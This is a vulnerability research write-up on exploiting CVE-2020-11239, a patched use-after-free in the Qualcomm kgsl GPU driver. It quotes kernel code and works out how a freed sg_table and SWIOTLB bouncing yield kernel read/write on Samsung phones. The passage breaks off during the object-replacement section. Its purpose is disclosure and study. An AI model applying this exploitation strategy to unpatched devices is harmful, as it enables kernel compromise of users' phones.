One day short of a full chain: Part 1 — Android Kernel arbitrary code execution

Android Kernel arbitrary code execution

Original text by Man Yue Mo

In this series of posts, I’ll exploit three bugs that I reported last year: a use-after-free in the renderer of Chrome, a Chromium sandbox escape that was reported and fixed while it was still in beta, and a use-after-free in the Qualcomm msm kernel. Together, these three bugs form an exploit chain that allows remote kernel code execution by visiting a malicious website in the beta version of Chrome. While the full chain itself only affects the beta version of Chrome, both the renderer RCE and the kernel code execution bugs existed in stable versions of the respective software. All of these bugs had been patched for quite some time, with the last one patched on the first of January.

Vulnerabilities used in the series

The three vulnerabilities that I’m going to use are the following. To achieve arbitrary kernel code execution from a compromised beta version of Chrome, I’ll use CVE-2020-11239, a use-after-free in the kgsl driver in the Qualcomm msm kernel. This vulnerability was reported to the Android security team in July 2020 as A-161544755 (GHSL-2020-375) and was patched in the January Bulletin. In the security bulletin, this bug was mistakenly associated with A-168722551, although the Android security team has since confirmed that they will acknowledge me as the original reporter of the issue. (However, the acknowledgement page had not been updated to reflect this at the time of writing.) For compromising Chrome, I’ll use CVE-2020-15972, a use-after-free in web audio, to trigger a renderer RCE. This is a duplicate bug, which an anonymous researcher had reported about three weeks before I reported it as 1125635 (GHSL-2020-167). To escape the Chrome sandbox and gain control of the browser process, I’ll use CVE-2020-16045, which was reported as 1125614 (GHSL-2020-165). While the exploit uses a component that was only enabled in the beta version of Chrome, the bug would probably have made it into the stable version and been exploitable had it not been reported. Interestingly, the renderer bug CVE-2020-15972 was fixed in version 86.0.4240.75, the same version in which the sandbox escape bug would have made it into the stable version of Chrome (had it not been reported), so these two bugs literally missed each other by one day to form a stable full chain.

Qualcomm kernel vulnerability

The vulnerability used in this post is a use-after-free in the kernel graphics support layer (kgsl) driver. This driver provides an interface for userland apps to communicate with the Adreno gpu (the gpu used on Qualcomm’s snapdragon chipset). As apps need to access this driver to render themselves, it is one of the few drivers that can be reached from third-party applications on all phones that use Qualcomm chipsets. The vulnerability itself can be triggered on any of these phones running kernel version 4.14 or above, which should be the case for many mid-to-high-end phones released after late 2019, for example the Pixel 4, Samsung Galaxy S10, S20, and A71. The exploit in this post, however, could not be launched directly from a third-party app on the Pixel 4 due to further SELinux restrictions, but it can be launched from third-party apps on Samsung phones and possibly some others as well. The exploit was largely developed on a Pixel 4 running AOSP built from source and then adapted to a Samsung Galaxy A71. With some adjustments of parameters, it should probably also work on flagship models like the Samsung Galaxy S10 and S20 (Snapdragon versions), although I don’t have those phones and have not tried it myself.

The vulnerability here concerns the ioctl calls IOCTL_KGSL_GPUOBJ_IMPORT and IOCTL_KGSL_MAP_USER_MEM. These calls are used by apps to create shared memory between themselves and the kgsl driver.

When using these calls, the caller specifies a user space address in their process, the size of the shared memory, as well as the type of memory objects to create. After making the ioctl call successfully, the kgsl driver would map the user supplied memory into the gpu’s memory space and be able to access the user supplied memory. Depending on the type of the memory specified in the ioctl call parameter, different mechanisms are used by the kernel to map and access the user space memory.

The two different types of memory are as follows. KGSL_USER_MEM_TYPE_ADDR asks kgsl to pin the supplied user memory and perform direct I/O on it (see, for example, the Performing Direct I/O section here). The caller can also specify the memory type to be KGSL_USER_MEM_TYPE_ION, which uses a direct memory access (DMA) buffer (see, for example, the Direct Memory Access section here) allocated by the ion allocator, allowing the gpu to access the DMA buffer directly. We’ll look at DMA buffers in more detail later, as they are important to both the vulnerability and the exploit; for now, we just need to know that there are two different types of memory objects that can be created from these ioctl calls. When using these ioctls, a kgsl_mem_entry object is first created, and then the type of memory is checked to make sure that the kgsl_mem_entry is correctly populated. In a way, these ioctl calls act like constructors of kgsl_mem_entry:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
    entry = kgsl_mem_entry_create();
	if (param->type == KGSL_USER_MEM_TYPE_ADDR)
		ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
			entry, param);
	else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
		ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
			entry, param, &fd);
	else
		ret = -ENOTSUPP;

In particular, when creating a kgsl_mem_entry with DMA type memory, the user supplied DMA buffer will be "attached" to the gpu, which will then allow the gpu to share the DMA buffer. The process of sharing a DMA buffer with a device on Android generally looks like this (see this for the general process):

  1. The user creates a DMA buffer using the ion allocator. On Android, ion is the concrete implementation of DMA buffers, so sometimes the terms are used interchangeably, as in the kgsl code here, in which KGSL_USER_MEM_TYPE_DMABUF and KGSL_USER_MEM_TYPE_ION refer to the same thing.
  2. The ion allocator will then allocate memory from the ion heap, which is a special region of memory separated from the heap used by the kmalloc family of calls. I’ll cover more about the ion heap later in the post.
  3. The ion allocator will return a file descriptor to the user, which is used as a handle to the DMA buffer.
  4. The user can then pass this file descriptor to the device via an appropriate ioctl call.
  5. The device then obtains the DMA buffer from the file descriptor via dma_buf_get and uses dma_buf_attach to attach it to itself.
  6. The device uses dma_buf_map_attachment to obtain the sg_table of the DMA buffer, which contains the locations and sizes of the backing stores of the DMA buffer. It can then use it to access the buffer.
  7. After this, both the device and the user can access the DMA buffer. This means that the buffer can now be modified by both the cpu (by the user) and the device, so care must be taken to synchronize the cpu view of the buffer and the device view of the buffer. (For example, the cpu may cache the content of the DMA buffer, and if the device then modifies the buffer, the cpu (user) view ends up with stale data.) To do this, the user can use the DMA_BUF_IOCTL_SYNC call of the DMA buffer to synchronize the different views of the buffer before and after accessing it.

When the device is done with the shared buffer, it is important to call the functions dma_buf_unmap_attachment, dma_buf_detach, and dma_buf_put to perform the appropriate clean up.

In the case of sharing DMA buffer with the kgsl driver, the sg_table that belongs to the DMA buffer will be stored in the kgsl_mem_entry as the field sgt:

static int kgsl_setup_dma_buf(struct kgsl_device *device,
				struct kgsl_pagetable *pagetable,
				struct kgsl_mem_entry *entry,
				struct dma_buf *dmabuf)
	sg_table = dma_buf_map_attachment(attach, DMA_TO_DEVICE);
	meta->table = sg_table;
	entry->priv_data = meta;
	entry->memdesc.sgt = sg_table;

On the other hand, in the case of a MAP_USER_MEM type memory object, the sg_table in memdesc.sgt is created and owned by the kgsl_mem_entry:

static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
    //Creates an sg_table and stores it in memdesc->sgt
	ret = sg_alloc_table_from_pages(memdesc->sgt, pages, npages,
					0, memdesc->size, GFP_KERNEL);

As such, care must be taken with the ownership of memdesc->sgt when kgsl_mem_entry is destroyed. If the ioctl call somehow failed, then the memory object that is created will have to be destroyed. Depending on the type of the memory, the clean up logic will be different:

unmap:
	if (param->type == KGSL_USER_MEM_TYPE_DMABUF) {
		kgsl_destroy_ion(entry->priv_data);
		entry->memdesc.sgt = NULL;
	}

	kgsl_sharedmem_free(&entry->memdesc);


If we created an ION type memory object, then apart from the extra clean up that detaches the gpu from the DMA buffer, entry->memdesc.sgt is set to NULL before entering kgsl_sharedmem_free, which will free entry->memdesc.sgt:

void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc)
	if (memdesc->sgt) {
		sg_free_table(memdesc->sgt);
		kfree(memdesc->sgt);
	}

	if (memdesc->pages)

So far, so good: everything is taken care of. But a closer look reveals that, when creating a KGSL_USER_MEM_TYPE_ADDR object, the code first checks whether the user supplied address was allocated by the ion allocator; if so, it creates an ION type memory object instead.

static int kgsl_setup_useraddr(struct kgsl_device *device,
		struct kgsl_pagetable *pagetable,
		struct kgsl_mem_entry *entry,
		unsigned long hostptr, size_t offset, size_t size)
 	/* Try to set up a dmabuf - if it returns -ENODEV assume anonymous */
	ret = kgsl_setup_dmabuf_useraddr(device, pagetable, entry, hostptr);
	if (ret != -ENODEV)
		return ret;

	/* Okay - lets go legacy */
	return kgsl_setup_anon_useraddr(pagetable, entry,
		hostptr, offset, size);

While there is nothing wrong with using a DMA mapping when the user supplied memory is actually a DMA buffer (allocated by ion), if something goes wrong during the ioctl call, the clean up logic will take the wrong path and memdesc->sgt will be incorrectly freed. Fortunately, before the ION ABI change introduced in the 4.12 kernel, the now freed sg_table could not be reached again. After this change, however, the sg_table gets added to the dma_buf_attachment when a DMA buffer is attached to a device, and the dma_buf_attachment is then stored in the DMA buffer.

static int ion_dma_buf_attach(struct dma_buf *dmabuf, struct device *dev,
                                struct dma_buf_attachment *attachment)
        table = dup_sg_table(buffer->sg_table);
        a->table = table;                          //<---- c. duplicated table stored in attachment, which is the output of dma_buf_attach in a.
        list_add(&a->list, &buffer->attachments);  //<---- d. attachment got added to dma_buf::attachments
        return 0;

This attachment would normally be removed when the DMA buffer is detached from the device. However, because of the wrong clean up logic, the DMA buffer is never detached in this case (kgsl_destroy_ion is not called), meaning that after the ioctl call fails, the user supplied DMA buffer ends up with an attachment that contains a free’d sg_table. This sg_table will then be used every time the DMA_BUF_IOCTL_SYNC call is used on the buffer:

static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
                                          enum dma_data_direction direction,
                                          bool sync_only_mapped)
        list_for_each_entry(a, &buffer->attachments, list) {
                if (sync_only_mapped)
                        tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl,        //<--- use-after-free of a->table
                                                  direction, true);
                else
                        dma_sync_sg_for_cpu(a->dev, a->table->sgl,              //<--- use-after-free of a->table
                                            a->table->nents, direction);

There are actually multiple paths in this ioctl that can lead to the use of the sg_table in different ways.

Getting a free’d object with a fake out-of-memory error

While this looks like a very good use-after-free, one that allows me to hold onto a free’d object and use it at any convenient time and in different ways, to trigger it I first need to cause IOCTL_KGSL_GPUOBJ_IMPORT or IOCTL_KGSL_MAP_USER_MEM to fail, and to fail at the right place. The only place where a use-after-free can happen in the IOCTL_KGSL_GPUOBJ_IMPORT call is when it fails at kgsl_mem_entry_attach_process:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
	kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);
	if (param->type == KGSL_USER_MEM_TYPE_ADDR)
		ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
			entry, param);
	else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
		ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
			entry, param, &fd);
	else
		ret = -ENOTSUPP;

	if (ret)
		goto out;

	ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry);
	if (ret)
		goto unmap;

This is the last point where the call can fail. Any earlier failure will also not result in kgsl_sharedmem_free being called. One way that this can fail is if kgsl_mem_entry_track_gpuaddr failed to reserve memory in the gpu due to out-of-memory error:

static int kgsl_mem_entry_attach_process(struct kgsl_device *device,
		struct kgsl_process_private *process,
		struct kgsl_mem_entry *entry)
	ret = kgsl_mem_entry_track_gpuaddr(device, process, entry);
	if (ret) {
		return ret;

Of course, actually causing an out-of-memory error would be rather difficult and unreliable, as well as risking crashing the device by exhausting its memory.

If we look at how a user provided address is mapped to a gpu address in kgsl_iommu_get_gpuaddr (which is called by kgsl_mem_entry_track_gpuaddr), we see that an alignment parameter is taken from the flags of the kgsl_memdesc. (Note that these are actually user space gpu addresses, in the sense that the gpu uses them together with a pagetable specific to the user process to resolve the actual addresses. Different processes can therefore have the same gpu addresses resolving to different actual locations, in the same way that user space addresses can be the same in different processes but resolve to different locations.)

static int kgsl_iommu_get_gpuaddr(struct kgsl_pagetable *pagetable,
		struct kgsl_memdesc *memdesc)
	unsigned int align;
    //Uses `memdesc->flags` to compute the alignment parameter
	align = max_t(uint64_t, 1 << kgsl_memdesc_get_align(memdesc),

and the flags of memdesc is taken from the flags parameter when the ioctl is called:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
	kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);

When mapping memory to the gpu, this align value will be used to ensure that the memory is mapped to a gpu address that is aligned to (i.e. a multiple of) align. In particular, the gpu address will be the next multiple of align that is not already occupied. If no such value exists, then an out-of-memory error will occur. So by using a large align value in the ioctl call, I can easily use up all the addresses that are aligned with the value that I specified. For example, if I set align to 1 << 31, then there will only be two addresses that align with it (0 and 1 << 31). So after mapping just one memory object (which can be as small as 4096 bytes), I’ll get an out-of-memory error the next time I use the ioctl call. This will then give me a free’d sg_table in the DMA buffer. By allocating another object of similar size in the kernel, I can then replace this sg_table with an object that I control. I’ll go through the details of how to do this later, but for now, let’s assume I am able to do this and have complete control of all the fields in this sg_table, and see what this bug potentially allows me to do.

The primitives of the vulnerability

As mentioned before, there are different ways to use the free’d sg_table via the DMA_BUF_IOCTL_SYNC ioctl call:

static long dma_buf_ioctl(struct file *file,
			  unsigned int cmd, unsigned long arg)
	switch (cmd) {
		if (sync.flags & DMA_BUF_SYNC_END)
			if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
				ret = dma_buf_end_cpu_access_umapped(dmabuf,
				ret = dma_buf_end_cpu_access(dmabuf, dir);
			if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
				ret = dma_buf_begin_cpu_access_umapped(dmabuf,
				ret = dma_buf_begin_cpu_access(dmabuf, dir);

		return ret;

These end up calling the functions __ion_dma_buf_begin_cpu_access or __ion_dma_buf_end_cpu_access, which provide the concrete implementations.

As explained before, the DMA_BUF_IOCTL_SYNC call is meant to synchronize the cpu view of the DMA buffer and the device (in this case, gpu) view of the DMA buffer. For the kgsl device, the synchronization is implemented in lib/swiotlb.c. The various different ways of syncing the buffer will more or less follow a code path like this:

  1. The scatterlist in the free’d sg_table is iterated in a loop;
  2. In each iteration, the dma_address and dma_length of the scatterlist are used to identify the location and size of the memory to synchronize.
  3. The function swiotlb_sync_single is called to perform the actual synchronization of the memory.

So what does swiotlb_sync_single do? It first checks whether the dma_address (dev_addr; dma_to_phys for kgsl is just the identity function) in the scatterlist is an address of a swiotlb_buffer using the is_swiotlb_buffer function. If so, it calls swiotlb_tbl_sync_single; otherwise, it calls dma_mark_clean.

static void
swiotlb_sync_single(struct device *hwdev, dma_addr_t dev_addr,
		    size_t size, enum dma_data_direction dir,
		    enum dma_sync_target target)
	phys_addr_t paddr = dma_to_phys(hwdev, dev_addr);

	BUG_ON(dir == DMA_NONE);

	if (is_swiotlb_buffer(paddr)) {
		swiotlb_tbl_sync_single(hwdev, paddr, size, dir, target);
		return;
	}

	if (dir != DMA_FROM_DEVICE)
		return;

	dma_mark_clean(phys_to_virt(paddr), size);

The function dma_mark_clean simply flushes the cpu cache that corresponds to dev_addr and keeps the cpu cache in sync with the actual memory. I wasn’t able to exploit this path and so I’ll concentrate on the swiotlb_tbl_sync_single path.

void swiotlb_tbl_sync_single(struct device *hwdev, phys_addr_t tlb_addr,
			     size_t size, enum dma_data_direction dir,
			     enum dma_sync_target target)
	int index = (tlb_addr - io_tlb_start) >> IO_TLB_SHIFT;
	phys_addr_t orig_addr = io_tlb_orig_addr[index];

	if (orig_addr == INVALID_PHYS_ADDR)                            //<--------- a. checks address valid
		return;
	orig_addr += (unsigned long)tlb_addr & ((1 << IO_TLB_SHIFT) - 1);

	switch (target) {
		if (likely(dir == DMA_FROM_DEVICE || dir == DMA_BIDIRECTIONAL))
			swiotlb_bounce(orig_addr, tlb_addr,
				       size, DMA_FROM_DEVICE);

After a further check of the address (tlb_addr) against an array io_tlb_orig_addr, the function swiotlb_bounce is called.

static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
			   size_t size, enum dma_data_direction dir)
	unsigned char *vaddr = phys_to_virt(tlb_addr);
	if (PageHighMem(pfn_to_page(pfn))) {

		while (size) {
			sz = min_t(size_t, PAGE_SIZE - offset, size);

			buffer = kmap_atomic(pfn_to_page(pfn));
			if (dir == DMA_TO_DEVICE)
				memcpy(vaddr, buffer + offset, sz);
			else
				memcpy(buffer + offset, vaddr, sz);
	} else if (dir == DMA_TO_DEVICE) {
		memcpy(vaddr, phys_to_virt(orig_addr), size);
	} else {
		memcpy(phys_to_virt(orig_addr), vaddr, size);

As tlb_addr and size come from a scatterlist in the free’d sg_table, it becomes clear that I may be able to call memcpy with a partially controlled source/destination (tlb_addr comes from the scatterlist but is constrained, as it needs to pass some checks, while size is unchecked). This could potentially give me a very strong relative read/write primitive. The questions are:

  1. What is the swiotlb_buffer and is it possible to pass the is_swiotlb_buffer check without a separate info leak?
  2. What is io_tlb_orig_addr and how do I pass that check?
  3. How much control do I have over orig_addr, which comes from io_tlb_orig_addr?

The Software Input Output Translation Lookaside Buffer

The Software Input Output Translation Lookaside Buffer (SWIOTLB), sometimes known as the bounce buffer, is a memory region whose physical address fits in 32 bits. It seems to be very rarely used in modern Android phones, and as far as I can gather, there are two main uses of it:

  1. It is used when a DMA buffer that has a physical address higher than 32 bits is attached to a device that can only access 32 bit addresses. In this case, the SWIOTLB is used as a proxy of the DMA buffer to allow access of it from the device. This is the code path that we have been looking at. As this would mean an extra read/write operation between the DMA buffer and the SWIOTLB every time a synchronization between the device and DMA buffer happens, it is not an ideal scenario but is rather only used as a last resort.
  2. As a layer of protection to prevent untrusted usb devices from accessing DMA memory directly (see here).

As the second usage likely involves plugging a usb device into the phone and thus requires physical access, I’ll only cover the first usage here, which will also answer the three questions in the previous section.

To begin with, let’s take a look at the location of the SWIOTLB. This is used by the check is_swiotlb_buffer to determine whether a physical address belongs to the SWIOTLB:

int is_swiotlb_buffer(phys_addr_t paddr)
	return paddr >= io_tlb_start && paddr < io_tlb_end;

The global variables io_tlb_start and io_tlb_end mark the range of the SWIOTLB. As mentioned before, the SWIOTLB needs to be at an address that fits in 32 bits. How does the kernel guarantee this? By allocating the SWIOTLB very early during boot. From a rooted device, we can see that the SWIOTLB is allocated nearly right at the start of the boot. This is an excerpt of the kernel log during the early stage of booting a Pixel 4:

[    0.000000] c0      0 software IO TLB: swiotlb init: 00000000f3800000
[    0.000000] c0      0 software IO TLB: mapped [mem 0xf3800000-0xf3c00000] (4MB)

Here we see that io_tlb_start is 0xf3800000 while io_tlb_end is 0xf3c00000.

While allocating the SWIOTLB early makes sure that its address is below 32 bits, it also makes it predictable. In fact, the address only seems to depend on the amount of memory configured for the SWIOTLB, which is passed as the swiotlb boot parameter. For the Pixel 4, this is swiotlb=2048 (which seems to be a common parameter and is the same for the Galaxy S10 and S20) and will allocate 4MB of SWIOTLB (allocation size = swiotlb * 2048 bytes). For the Samsung Galaxy A71, the parameter is set to swiotlb=1, which allocates the minimum amount of SWIOTLB (0x40000 bytes):

[    0.000000] software IO TLB: mapped [mem 0xfffbf000-0xfffff000] (0MB)

The SWIOTLB will be at the same location when changing swiotlb to 1 on Pixel 4.

This provides us with a predictable location for the SWIOTLB to pass the is_swiotlb_buffer test.

Let’s take a look at io_tlb_orig_addr next. This is an array that stores the addresses of DMA buffers which use the SWIOTLB as a proxy because their own addresses are too high for the attached device to access:

swiotlb_map_sg_attrs(struct device *hwdev, struct scatterlist *sgl, int nelems,
		     enum dma_data_direction dir, unsigned long attrs)
	for_each_sg(sgl, sg, nelems, i) {
		phys_addr_t paddr = sg_phys(sg);
		dma_addr_t dev_addr = phys_to_dma(hwdev, paddr);

		if (swiotlb_force == SWIOTLB_FORCE ||
		    !dma_capable(hwdev, dev_addr, sg->length)) {
            //device cannot access dev_addr, so use SWIOTLB as a proxy
			phys_addr_t map = map_single(hwdev, sg_phys(sg),
						     sg->length, dir, attrs);

In this case, map_single will store the address of the DMA buffer (dev_addr) in the io_tlb_orig_addr. This means that if I can cause a SWIOTLB mapping to happen by attaching a DMA buffer with high address to a device that cannot access it (!dma_capable), then the orig_addr in memcpy of swiotlb_bounce will point to a DMA buffer that I control, which means I can read and write its content with complete control.

static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
			   size_t size, enum dma_data_direction dir)
    //orig_addr is the address of a DMA buffer that uses the SWIOTLB mapping
	} else if (dir == DMA_TO_DEVICE) {
		memcpy(vaddr, phys_to_virt(orig_addr), size);
	} else {
		memcpy(phys_to_virt(orig_addr), vaddr, size);

It now becomes clear that, if I can allocate a SWIOTLB, then I will be able to perform both read and write of a region behind the SWIOTLB region with arbitrary size (and completely controlled content in the case of write). In what follows, this is what I’m going to use for the exploit.

To summarize, this is how synchronization works for a DMA buffer shared with a device when it is implemented in lib/swiotlb.c.

When the device is capable of accessing the DMA buffer’s address, synchronization will involve flushing the cpu cache:


When the device cannot access the DMA buffer directly, a SWIOTLB is created as an intermediate buffer to allow device access. In this case, the io_tlb_orig_addr array is served as a look up table to locate the DMA buffer from the SWIOTLB.


In the use-after-free scenario, I can control the size of the memcpy between the DMA buffer and SWIOTLB in the above figure and that turns into a read/write primitive:


Provided I can control the scatterlist that specifies the location and size of the SWIOTLB, I can specify a size larger than the original DMA buffer to cause an out-of-bounds access (I still need to point to the SWIOTLB to pass the checks). Of course, it is no good to just cause an out-of-bounds access; I need to be able to read back the out-of-bounds data in the case of a read access, and control the data that I write in the case of a write access. This issue will be addressed in the next section.

Allocating a Software Input Output Translation Lookaside Buffer

As it turns out, the SWIOTLB is actually very rarely used. For one reason or another, either because most devices are capable of reading 64 bit addresses, or because DMA buffer synchronization is implemented with arm_smmu rather than swiotlb, I only managed to allocate a SWIOTLB using the adsprpc driver. The adsprpc driver is used for communicating with the DSP (digital signal processor), a separate processor on Qualcomm’s snapdragon chipset. The DSP and adsprpc itself is a vast topic with many security implications, and it is out of the scope of this post.

Roughly speaking, the DSP is a specialized chip that is optimized for certain computationally intensive tasks such as image, video, audio processing and machine learning. The cpu can offload these tasks to the DSP to improve overall performance. However, as the DSP is a different processor altogether, an RPC mechanism is needed to pass data and instructions between the cpu and the DSP. This is what the adsprpc driver is for. It allows the kernel to communicate with the DSP (which is running on a separate kernel and OS altogether, so this is truly «remote») to invoke functions, allocate memory and retrieve results from the DSP.

While access to the adsprpc driver from third-party apps is not granted in the default SELinux settings, and as such I’m unable to use it on Google’s Pixel phones, it is still enabled on many different phones running Qualcomm’s snapdragon SoC (system on chip). For example, Samsung phones allow access to adsprpc from third-party apps, which allows the exploit in this post to be launched directly from a third-party app or from a compromised beta version of Chrome (or any other compromised app). On phones where adsprpc access is not allowed, such as the Pixel 4, an additional bug that compromises a service with access to adsprpc is required to launch this exploit. There are various services that can access the adsprpc driver and are reachable directly from third-party apps, such as hal_neuralnetworks, which is implemented as a closed source service in android.hardware.neuralnetworks@1.x-service-qti. I did not investigate this path, so I’ll assume Samsung phones in the rest of this post.

With adsprpc, the most obvious ioctl to use for allocating SWIOTLB is the FASTRPC_IOCTL_MMAP, which calls fastrpc_mmap_create to attach a DMA buffer that I supplied:

static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd,
	unsigned int attr, uintptr_t va, size_t len, int mflags,
	struct fastrpc_mmap **ppmap)
	} else if (mflags == FASTRPC_DMAHANDLE_NOMAP) {
		VERIFY(err, !IS_ERR_OR_NULL(map->buf = dma_buf_get(fd)));
		if (err)
			goto bail;
		VERIFY(err, !dma_buf_get_flags(map->buf, &flags));
		map->attach->dma_map_attrs |= DMA_ATTR_SKIP_CPU_SYNC;

However, the call seems to always fail when fastrpc_mmap_on_dsp is called, which will then detach the DMA buffer from the adsprpc driver and remove the SWIOTLB that was just allocated. While it is possible to work with a temporary buffer like this by racing with multiple threads, it would be better if I could allocate a permanent SWIOTLB.

Another possibility is to use the get_args function, which will also invoke fastrpc_mmap_create:

static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
	for (i = bufs; i < bufs + handles; i++) {
		if (ctx->attrs && (ctx->attrs[i] & FASTRPC_ATTR_NOMAP))
		VERIFY(err, !fastrpc_mmap_create(ctx->fl, ctx->fds[i],
				FASTRPC_ATTR_NOVA, 0, 0, dmaflags,

The get_args function is used in the various FASTRPC_IOCTL_INVOKE_* calls for passing arguments to functions invoked on the DSP. Under normal circumstances, a corresponding put_args will be called to detach the DMA buffer from the adsprpc driver. However, if the remote invocation fails, the call to put_args will be skipped and the clean up will be deferred to the time when the adsprpc file is closed:

static int fastrpc_internal_invoke(struct fastrpc_file *fl, uint32_t mode,
				   uint32_t kernel,
				   struct fastrpc_ioctl_invoke_crc *inv)
	if (REMOTE_SCALARS_LENGTH(ctx->sc)) {
		PERF(fl->profile, GET_COUNTER(perf_counter, PERF_GETARGS),
		VERIFY(err, 0 == get_args(kernel, ctx));                  //<----- get_args
		if (err)
			goto bail;
	if (kernel) {
	} else {
		interrupted = wait_for_completion_interruptible(&ctx->work);
		VERIFY(err, 0 == (err = interrupted));
		if (err)
			goto bail;                                        //<----- invocation failed and jump to bail directly
	VERIFY(err, 0 == put_args(kernel, ctx, invoke->pra));    //<------ detach the arguments
	return err;

So by using FASTRPC_IOCTL_INVOKE_* with an invalid remote function, it is easy to allocate a SWIOTLB and keep it alive until I choose to close the /dev/adsprpc-smd file that was used to make the ioctl call. This is the only part for which the adsprpc driver is needed, and we’re now set up to start writing the exploit.

Now that I can allocate SWIOTLB buffers that map to DMA buffers I created, I can do the following to exploit the out-of-bounds read/write primitive from the previous section.

  1. First allocate a number of DMA buffers. By manipulating the ion heap (which I’ll go through later in this post), I can place some useful data behind one of these DMA buffers. I will call this buffer DMA_1.
  2. Use the adsprpc driver to allocate SWIOTLB buffers associated with these DMA buffers. I’ll arrange it so that DMA_1 occupies the first SWIOTLB (which means all the other SWIOTLB buffers will be allocated behind it); call this SWIOTLB_1. This can be done easily, as SWIOTLB buffers are simply allocated from a contiguous array.
  3. Use the read/write primitive in the previous section to trigger out-of-bounds read/write on DMA_1. This will either write the memory behind DMA_1 to the SWIOTLB behind SWIOTLB_1, or vice versa.
  4. As the SWIOTLB behind SWIOTLB_1 are mapped to the other DMA buffers that I controlled, I can use the DMA_BUF_IOCTL_SYNC ioctl of these DMA buffers to either read data from these SWIOTLB or write data to them. This translates into arbitrary read/write of memory behind DMA_1.
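Step four above relies on the standard DMA_BUF_IOCTL_SYNC interface. A minimal sketch of issuing that sync call on a dma-buf fd, with the relevant definitions from the uapi header linux/dma-buf.h reproduced so the snippet is self-contained (the helper name is mine):

```c
#include <stdint.h>
#include <sys/ioctl.h>

/* Definitions from the uapi header linux/dma-buf.h, reproduced here so the
 * sketch is self-contained. */
struct dma_buf_sync {
	uint64_t flags;
};
#define DMA_BUF_SYNC_READ  (1 << 0)
#define DMA_BUF_SYNC_WRITE (2 << 0)
#define DMA_BUF_SYNC_RW    (DMA_BUF_SYNC_READ | DMA_BUF_SYNC_WRITE)
#define DMA_BUF_SYNC_START (0 << 2)
#define DMA_BUF_SYNC_END   (1 << 2)
#define DMA_BUF_IOCTL_SYNC _IOW('b', 0, struct dma_buf_sync)

/* Ask the kernel to sync the buffer for CPU access; internally this walks
 * the buffer's scatterlist, which is the data the exploit corrupts. */
static int dma_buf_begin_cpu_access(int dmabuf_fd)
{
	struct dma_buf_sync sync = { .flags = DMA_BUF_SYNC_START | DMA_BUF_SYNC_RW };
	return ioctl(dmabuf_fd, DMA_BUF_IOCTL_SYNC, &sync);
}
```

A matching call with DMA_BUF_SYNC_END finishes the CPU access; both directions trigger the scatterlist walk described above.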

The following figure illustrates this with a simplified case of two DMA buffers.


Replacing the sg_table

So far, I have planned an exploitation strategy based on the assumption that I already control the scatterlist sgl of the free'd sg_table. In order to actually gain control of it, I need to replace the free'd sg_table with a suitable object. This turns out to be the most complicated part of the exploit. While there are well-known kernel heap spraying techniques that allow us to replace a free'd object with controlled data (for example sendmsg and setxattr), they cannot be applied directly here, as the sgl of the free'd sg_table needs to be a valid pointer that points to controlled data. Without a way to leak a heap address, I'm not able to use these heap spraying techniques to construct a valid object, and with this bug alone, there is almost no hope of getting an info leak at this stage. The alternative is to look for other suitable objects to replace the sg_table. A CodeQL query can be used to help look for suitable objects:

from FunctionCall fc, Type t, Variable v, Field f, Type t2
where (fc.getTarget().hasName("kmalloc") or
       fc.getTarget().hasName("kzalloc") or
       fc.getTarget().hasName("kcalloc")) and
      exists(Assignment assign | assign.getRValue() = fc and
             assign.getLValue() = v.getAnAccess() and
             v.getType().(PointerType).refersToDirectly(t)) and
      t.getSize() < 128 and t.fromSource() and
      f.getDeclaringType() = t and
      (f.getType().(PointerType).refersTo(t2) and t2.getSize() <= 8) and
      f.getByteOffset() = 0
select fc, t, fc.getLocation()

In this query, I look for objects created via kmalloc, kzalloc or kcalloc that are of size smaller than 128 (the same bucket as sg_table) and have a pointer field as the first field. However, I wasn't able to find a suitable object, although filename allocated in getname_flags came close:

struct filename *
getname_flags(const char __user *filename, int flags, int *empty)
{
	struct filename *result;
	...
	if (unlikely(len == EMBEDDED_NAME_MAX)) {
		...
		result = kzalloc(size, GFP_KERNEL);
		if (unlikely(!result)) {
			...
			return ERR_PTR(-ENOMEM);
		}
		...
		result->name = kname;
		len = strncpy_from_user(kname, filename, PATH_MAX);
		...
	}
	...
}

with name pointing to a user controlled string, reachable using, for example, the mknod syscall. However, the inability to use null characters turns out to be too much of a restriction here.

Just-in-time object replacement

Let's take a look at how the free'd sg_table is used, say, in __ion_dma_buf_begin_cpu_access. It turns out that at some point in the execution, the sgl field is taken from the sg_table, after which the sg_table itself is no longer used; only the cached pointer value of sgl is used:

static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
					  enum dma_data_direction direction,
					  bool sync_only_mapped)
{
	...
		if (sync_only_mapped)
			tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl,    //<------- `sgl` got passed, and `table` never used again
						  direction, true);
		else
			dma_sync_sg_for_cpu(a->dev, a->table->sgl,
					    a->table->nents, direction);
	...
}

